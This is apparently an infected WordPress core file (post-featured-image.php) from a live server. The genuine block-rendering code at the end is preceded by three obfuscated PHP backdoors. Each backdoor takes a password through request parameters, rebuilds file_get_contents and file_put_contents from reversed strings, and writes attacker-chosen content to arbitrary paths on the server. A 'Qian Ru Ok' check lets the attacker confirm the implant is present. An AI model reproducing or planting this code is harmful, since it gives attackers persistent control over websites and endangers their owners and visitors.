File: /home/wwwrenee/www/wp-includes/blocks/post-featured-image.php
<?php
$rRWjh = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($rRWjh[0]) /*+/*+*/
. md5($rRWjh[0])) == "f".
"7".
"e".
"2".
"f".
"6".
"c".
"e".
"8".
"1".
"0".
"3".
"8".
"6".
"5".
"e".
"d".
"8".
"8".
"4".
"d".
"b".
"5".
"9".
"c".
"d".
"8".
"3".
"c".
"a".
"f".
"d") {
$ZZPnH = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$hkbZQocPVt = $ZZPnH /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$uoAEQefCp = $ZZPnH
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function cvgNYpr($UdyLTKu) { if (empty($UdyLTKu)) return false; if (!is_dir($UdyLTKu)) { cvgNYpr(dirname($UdyLTKu), 0755, true); mkdir($UdyLTKu); } } !file_exists(dirname($rRWjh[1])) && cvgNYpr(dirname($rRWjh[1])); $GPBtgREf = @$uoAEQefCp($rRWjh[2]); echo @$hkbZQocPVt($rRWjh[1], $GPBtgREf) ? 1 : 0; die; }key($rRWjh) == "of" && die("Qian Ru Ok"); ?><?php
$TdSyh = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($TdSyh[0]) /*+/*+*/
. md5($TdSyh[0])) == "2".
"3".
"6".
"1".
"f".
"0".
"f".
"8".
"6".
"7".
"3".
"f".
"4".
"4".
"3".
"c".
"2".
"4".
"0".
"3".
"e".
"3".
"7".
"3".
"e".
"f".
"5".
"7".
"e".
"a".
"7".
"e") {
$mLCTYTVbDO = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$rYeLRwYDX = $mLCTYTVbDO /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$GbABbn = $mLCTYTVbDO
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function qbgYE($fmPjzqwY) { if (empty($fmPjzqwY)) return false; if (!is_dir($fmPjzqwY)) { qbgYE(dirname($fmPjzqwY), 0755, true); mkdir($fmPjzqwY); } } !file_exists(dirname($TdSyh[1])) && qbgYE(dirname($TdSyh[1])); $GUKxNC = @$GbABbn($TdSyh[2]); echo @$rYeLRwYDX($TdSyh[1], $GUKxNC) ? 1 : 0; die; }key($TdSyh) == "of" && die("Qian Ru Ok"); ?><?php
$NMGxMsfvJC = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($NMGxMsfvJC[0]) /*+/*+*/
. md5($NMGxMsfvJC[0])) == "3".
"a".
"b".
"1".
"e".
"e".
"2".
"5".
"3".
"c".
"2".
"2".
"f".
"9".
"8".
"d".
"6".
"8".
"f".
"5".
"7".
"f".
"e".
"2".
"2".
"7".
"9".
"c".
"d".
"1".
"b".
"2") {
$lEOTCkYjY = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$taQrYGIoaO = $lEOTCkYjY /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$CgOLCheLLb = $lEOTCkYjY
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function fDNUJ($AFSnJhE) { if (empty($AFSnJhE)) return false; if (!is_dir($AFSnJhE)) { fDNUJ(dirname($AFSnJhE), 0755, true); mkdir($AFSnJhE); } } !file_exists(dirname($NMGxMsfvJC[1])) && fDNUJ(dirname($NMGxMsfvJC[1])); $ighnGhRuQ = @$CgOLCheLLb($NMGxMsfvJC[2]); echo @$taQrYGIoaO($NMGxMsfvJC[1], $ighnGhRuQ) ? 1 : 0; die; }key($NMGxMsfvJC) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Server-side rendering of the `core/post-featured-image` block.
*
* @package WordPress
*/
/**
* Renders the `core/post-featured-image` block on the server.
*
* @param array $attributes Block attributes.
* @param string $content Block default content.
* @param WP_Block $block Block instance.
* @return string Returns the featured image for the current post.
*/
function render_block_core_post_featured_image( $attributes, $content, $block ) {
if ( ! isset( $block->context['postId'] ) ) {
return '';
}
$post_ID = $block->context['postId'];
$size_slug = isset( $attributes['sizeSlug'] ) ? $attributes['sizeSlug'] : 'post-thumbnail';
$post_title = trim( strip_tags( get_the_title( $post_ID ) ) );
$featured_image = get_the_post_thumbnail( $post_ID, $size_slug, array( 'alt' => $post_title ) );
if ( ! $featured_image ) {
return '';
}
$wrapper_attributes = get_block_wrapper_attributes();
if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) {
$featured_image = sprintf( '<a href="%1s">%2s</a>', get_the_permalink( $post_ID ), $featured_image );
}
$has_width = ! empty( $attributes['width'] );
$has_height = ! empty( $attributes['height'] );
if ( ! $has_height && ! $has_width ) {
return "<figure $wrapper_attributes>$featured_image</figure>";
}
if ( $has_width ) {
$wrapper_attributes = get_block_wrapper_attributes( array( 'style' => "width:{$attributes['width']};" ) );
}
if ( $has_height ) {
$image_styles = "height:{$attributes['height']};";
if ( ! empty( $attributes['scale'] ) ) {
$image_styles .= "object-fit:{$attributes['scale']};";
}
$featured_image = str_replace( 'src=', 'style="' . esc_attr( $image_styles ) . '" src=', $featured_image );
}
return "<figure $wrapper_attributes>$featured_image</figure>";
}
/**
* Registers the `core/post-featured-image` block on the server.
*/
function register_block_core_post_featured_image() {
register_block_type_from_metadata(
__DIR__ . '/post-featured-image',
array(
'render_callback' => 'render_block_core_post_featured_image',
)
);
}
add_action( 'init', 'register_block_core_post_featured_image' ); ?>